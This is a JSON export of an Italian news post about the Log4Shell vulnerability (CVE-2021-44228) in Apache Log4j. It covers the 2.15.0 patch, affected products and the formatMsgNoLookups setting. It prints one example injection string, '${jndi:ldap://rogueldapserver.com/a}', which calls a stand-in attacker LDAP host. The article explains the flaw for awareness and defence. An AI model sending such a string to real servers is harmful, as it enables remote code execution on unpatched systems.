{"id":22524,"date":"2021-12-14T22:27:17","date_gmt":"2021-12-14T21:27:17","guid":{"rendered":"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/"},"modified":"2021-12-14T22:27:17","modified_gmt":"2021-12-14T21:27:17","slug":"log4j-disponibile-un-aggiornamento-di-sicurezza","status":"publish","type":"post","link":"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/","title":{"rendered":"Log4j: disponibile un aggiornamento di sicurezza"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p>Gli sviluppatori di Apache hanno reso disponibile un aggiornamento con cui risolvere la vulnerabilit\u00e0 0-day (<a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-44228\" target=\"_blank\" rel=\"nofollow noopener\">CVE-2021-44228<\/a>) che affligge la libreria <strong>Log4j<\/strong> con un rischio per i server di numerose piattaforme ampiamente utilizzate, basti pensare a Minecraft, Steam, Twitter e iCloud, cos\u00ec come per i client che interagiscono con queste ultime.<span id=\"more-406091\"\/><\/p>\n<h2>Log4j: le piattaforme coinvolte<\/h2>\n<p>Parliamo di una vulnerabilit\u00e0 (nota anche come <strong>Log4Shell<\/strong>) talmente grave da meritarsi un punteggio pari a 10 su 10 nella scala CVSS (<em>Common Vulnerability Scoring System<\/em>), attraverso di essa un utente malintenzionato potrebbe dar vita ad attivit\u00e0 <strong>RCE<\/strong> (<em>Remote Code Execution<\/em>) eseguendo del codice arbitrario senza necessit\u00e0 di autenticazione e con competenze tecniche relativamente basilari. <\/p>\n<p>A tal proposito esisterebbe gi\u00e0 il <a href=\"https:\/\/therecord.media\/log4j-zero-day-gets-security-fix-just-as-scans-for-vulnerable-systems-ramp-up\/\" target=\"_blank\" rel=\"nofollow noopener\">Proof of concept<\/a> di un exploit che ha avuto come target Twitter.<\/p>\n<p>In pratica la vulnerabilit\u00e0 deriverebbe da come i messaggi di log vengono gestiti dal log4j, se per esempio un attaccante inviasse un messaggio appositamente confezionato per contenere un stringa sul modello della seguente:<\/p>\n<pre><code class=\"language-markup\">\n${jndi:ldap:\/\/rogueldapserver.com\/a})\n<\/code><\/pre>\n<p>il risultato potrebbe essere quello di caricare del codice esterno e di eseguirlo. Lo schema seguente evidenzia ad esempio come tale procedura possa essere effettuata tramite il riferimento ad una <strong>JNDI<\/strong> (<em>Java Naming and Directory Interface<\/em>) in un <code>User-Agent<\/code>:<\/p>\n<blockquote class=\"twitter-tweet\">\n<p lang=\"en\" dir=\"ltr\">the <a href=\"https:\/\/twitter.com\/hashtag\/log4j?src=hash&amp;ref_src=twsrc%5Etfw\">#log4j<\/a> scramble in a nutshell <a href=\"https:\/\/t.co\/XSwxEJucsI\">pic.twitter.com\/XSwxEJucsI<\/a><\/p>\n<p>\u2014 Yong Sheng (@ystan_) <a href=\"https:\/\/twitter.com\/ystan_\/status\/1470206230647894016?ref_src=twsrc%5Etfw\">December 13, 2021<\/a><\/p>\n<\/blockquote>\n<p>Gli effetti di un\u2019azione malevola sono <a href=\"https:\/\/csirt.gov.it\/contenuti\/vulnerabilita-log4shell-cve-2021-44228-aggiornamento-bl02-211212-csirt-ita\" target=\"_blank\" rel=\"nofollow noopener\">spiegati<\/a> chiaramente nel bollettino riportato dal CSIRT (<em>Computer Security Incident Response Team<\/em>):<\/p>\n<blockquote>\n<p>L\u2019eventuale sfruttamento della falla consente l\u2019esecuzione di codice arbitrario a danno dell\u2019applicazione affetta. Gli aggressori, che non necessitano di un accesso preventivo al sistema, possono inviare una richiesta https malformata tramite una stringa appositamente predisposta, per generare un log su Log4j \u2013 che adotta JNDI (Java Naming and Directory Interface) \u2013 al fine di registrare la stringa dannosa nel registro dell\u2019applicazione. Durante l\u2019elaborazione del registro, il sistema vulnerabile si trover\u00e0 nelle condizioni di esegue il codice appositamente inserito dall\u2019utente malintenzionato. Questa condizione pu\u00f2 ad esempio portare l\u2019applicazione ad effettuare una richiesta verso un dominio dannoso per eseguire un payload malevolo. In questo modo per l\u2019attaccante sar\u00e0 possibile acquisire il controllo dell\u2019applicazione interessata e l\u2019accesso completo al sistema. <\/p>\n<\/blockquote>\n<p>A rendere particolarmente preoccupante la vulnerabilit\u00e0 sarebbe il fatto che essa coinvolge praticamente tutte le soluzioni della Apache Software Foundation dedicate ai contesti enterprise tra cui ad esempio Struts, Flink, Druid, Flume, Solr e Kafka. Nello stesso modo potrebbero essere esposti a problematiche di sicurezza progetti come Redis, ElasticSearch ed Elastic Logstash.<\/p>\n<h2>Un aggiornamento risolutivo?<\/h2>\n<p>L\u2019aggiornamento ora installabile \u00e8 contenuto nella versione 2.15.0 e in molti si sono chiesti se con esso si potr\u00e0 riportare alla normalit\u00e0 una situazione considerata non a torto compromessa.<\/p>\n<p>Alcuni esperti di sicurezza hanno fatto notare che il rischio sarebbe concreto soltanto nel caso in cui il valore del parametro <code>log4j2.formatMsgNoLookups<\/code> dovesse essere settato su <code>FALSE<\/code>. Ora nella release 2.15.0 quest\u2019ultimo sarebbe stato impostato su <code>TRUE<\/code> e riportarlo su <code>FALSE<\/code> non farebbe altro che annullare l\u2019utilit\u00e0 della patch.<\/p>\n<p>Stando cos\u00ec le cose, il fatto di agire direttamente sul parametro citato modificandone il valore in <code>TRUE<\/code> potrebbe risultare pi\u00f9 efficace che applicare un aggiornamento in cui non viene conservato il valore predefinito per <code>log4j2.formatMsgNoLookups<\/code>. <\/p>\n<p>Le versioni a rischio sono in pratica tutte quelle tra la 2.0 e la 2.14.1, a ci\u00f2 si aggiunga che non di rado Log4j viene utilizzato con release di Java datate e obsolete che gi\u00e0 di per s\u00e9 non offrono importanti garanzie dal punto di vista della sicurezza.<\/p>\n<p><em>Fonte<\/em>: <a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/\" class=\"text-link text-link--special\" target=\"_blank\" rel=\"nofollow noopener\"><span class=\"underline\">Log4j<\/span><i class=\"ico-external\"\/><\/a><\/p>\n<\/div>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><br \/>\n<br \/><br \/>\n<br \/><a href=\"https:\/\/www.html.it\/14\/12\/2021\/log4j-disponibile-un-aggiornamento-di-sicurezza\/\">Source link <\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Gli sviluppatori di Apache hanno reso disponibile un aggiornamento con cui risolvere la vulnerabilit\u00e0 0-day (CVE-2021-44228) che affligge la libreria Log4j con un rischio per i server di numerose piattaforme ampiamente utilizzate, basti pensare a Minecraft, Steam, Twitter e iCloud, cos\u00ec come per i client che interagiscono con queste ultime. Log4j: le piattaforme coinvolte Parliamo&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_s2mail":""},"categories":[37],"tags":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.13 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Log4j: disponibile un aggiornamento di sicurezza - AGENZIA WEB Italia<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Log4j: disponibile un aggiornamento di sicurezza - AGENZIA WEB Italia\" \/>\n<meta property=\"og:description\" content=\"Gli sviluppatori di Apache hanno reso disponibile un aggiornamento con cui risolvere la vulnerabilit\u00e0 0-day (CVE-2021-44228) che affligge la libreria Log4j con un rischio per i server di numerose piattaforme ampiamente utilizzate, basti pensare a Minecraft, Steam, Twitter e iCloud, cos\u00ec come per i client che interagiscono con queste ultime. Log4j: le piattaforme coinvolte Parliamo...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/\" \/>\n<meta property=\"og:site_name\" content=\"AGENZIA WEB Italia\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-14T21:27:17+00:00\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/#\/schema\/person\/c0748e23499fac2fd73b79d1379fdf42\"},\"headline\":\"Log4j: disponibile un aggiornamento di sicurezza\",\"datePublished\":\"2021-12-14T21:27:17+00:00\",\"dateModified\":\"2021-12-14T21:27:17+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/\"},\"wordCount\":584,\"publisher\":{\"@id\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/#organization\"},\"articleSection\":[\"News\"],\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/\",\"url\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/\",\"name\":\"Log4j: disponibile un aggiornamento di sicurezza - AGENZIA WEB Italia\",\"isPartOf\":{\"@id\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/#website\"},\"datePublished\":\"2021-12-14T21:27:17+00:00\",\"dateModified\":\"2021-12-14T21:27:17+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Log4j: disponibile un aggiornamento di sicurezza\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/#website\",\"url\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/\",\"name\":\"AGENZIA WEB Italia\",\"description\":\"Web design Web agency Italia\",\"publisher\":{\"@id\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/#organization\",\"name\":\"Multimedia Web\",\"url\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/wp-content\/uploads\/2016\/05\/multimediaweb1.png\",\"contentUrl\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/wp-content\/uploads\/2016\/05\/multimediaweb1.png\",\"width\":200,\"height\":57,\"caption\":\"Multimedia Web\"},\"image\":{\"@id\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/#\/schema\/person\/c0748e23499fac2fd73b79d1379fdf42\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.nycwebdesign.eu\/webdesign\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/991cd68bbfd6f946517378a63fc3a1f7?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/991cd68bbfd6f946517378a63fc3a1f7?s=96&d=mm&r=g\",\"caption\":\"admin\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Log4j: disponibile un aggiornamento di sicurezza - AGENZIA WEB Italia","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/","og_locale":"it_IT","og_type":"article","og_title":"Log4j: disponibile un aggiornamento di sicurezza - AGENZIA WEB Italia","og_description":"Gli sviluppatori di Apache hanno reso disponibile un aggiornamento con cui risolvere la vulnerabilit\u00e0 0-day (CVE-2021-44228) che affligge la libreria Log4j con un rischio per i server di numerose piattaforme ampiamente utilizzate, basti pensare a Minecraft, Steam, Twitter e iCloud, cos\u00ec come per i client che interagiscono con queste ultime. Log4j: le piattaforme coinvolte Parliamo...","og_url":"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/","og_site_name":"AGENZIA WEB Italia","article_published_time":"2021-12-14T21:27:17+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Scritto da":"admin","Tempo di lettura stimato":"3 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/#article","isPartOf":{"@id":"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/"},"author":{"name":"admin","@id":"https:\/\/www.nycwebdesign.eu\/webdesign\/#\/schema\/person\/c0748e23499fac2fd73b79d1379fdf42"},"headline":"Log4j: disponibile un aggiornamento di sicurezza","datePublished":"2021-12-14T21:27:17+00:00","dateModified":"2021-12-14T21:27:17+00:00","mainEntityOfPage":{"@id":"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/"},"wordCount":584,"publisher":{"@id":"https:\/\/www.nycwebdesign.eu\/webdesign\/#organization"},"articleSection":["News"],"inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/","url":"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/","name":"Log4j: disponibile un aggiornamento di sicurezza - AGENZIA WEB Italia","isPartOf":{"@id":"https:\/\/www.nycwebdesign.eu\/webdesign\/#website"},"datePublished":"2021-12-14T21:27:17+00:00","dateModified":"2021-12-14T21:27:17+00:00","breadcrumb":{"@id":"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.nycwebdesign.eu\/webdesign\/log4j-disponibile-un-aggiornamento-di-sicurezza\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.nycwebdesign.eu\/webdesign\/"},{"@type":"ListItem","position":2,"name":"Log4j: disponibile un aggiornamento di sicurezza"}]},{"@type":"WebSite","@id":"https:\/\/www.nycwebdesign.eu\/webdesign\/#website","url":"https:\/\/www.nycwebdesign.eu\/webdesign\/","name":"AGENZIA WEB Italia","description":"Web design Web agency Italia","publisher":{"@id":"https:\/\/www.nycwebdesign.eu\/webdesign\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.nycwebdesign.eu\/webdesign\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/www.nycwebdesign.eu\/webdesign\/#organization","name":"Multimedia Web","url":"https:\/\/www.nycwebdesign.eu\/webdesign\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.nycwebdesign.eu\/webdesign\/#\/schema\/logo\/image\/","url":"https:\/\/www.nycwebdesign.eu\/webdesign\/wp-content\/uploads\/2016\/05\/multimediaweb1.png","contentUrl":"https:\/\/www.nycwebdesign.eu\/webdesign\/wp-content\/uploads\/2016\/05\/multimediaweb1.png","width":200,"height":57,"caption":"Multimedia Web"},"image":{"@id":"https:\/\/www.nycwebdesign.eu\/webdesign\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.nycwebdesign.eu\/webdesign\/#\/schema\/person\/c0748e23499fac2fd73b79d1379fdf42","name":"admin","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.nycwebdesign.eu\/webdesign\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/991cd68bbfd6f946517378a63fc3a1f7?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/991cd68bbfd6f946517378a63fc3a1f7?s=96&d=mm&r=g","caption":"admin"}}]}},"_links":{"self":[{"href":"https:\/\/www.nycwebdesign.eu\/webdesign\/wp-json\/wp\/v2\/posts\/22524"}],"collection":[{"href":"https:\/\/www.nycwebdesign.eu\/webdesign\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.nycwebdesign.eu\/webdesign\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.nycwebdesign.eu\/webdesign\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nycwebdesign.eu\/webdesign\/wp-json\/wp\/v2\/comments?post=22524"}],"version-history":[{"count":0,"href":"https:\/\/www.nycwebdesign.eu\/webdesign\/wp-json\/wp\/v2\/posts\/22524\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.nycwebdesign.eu\/webdesign\/wp-json\/wp\/v2\/media?parent=22524"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.nycwebdesign.eu\/webdesign\/wp-json\/wp\/v2\/categories?post=22524"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.nycwebdesign.eu\/webdesign\/wp-json\/wp\/v2\/tags?post=22524"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}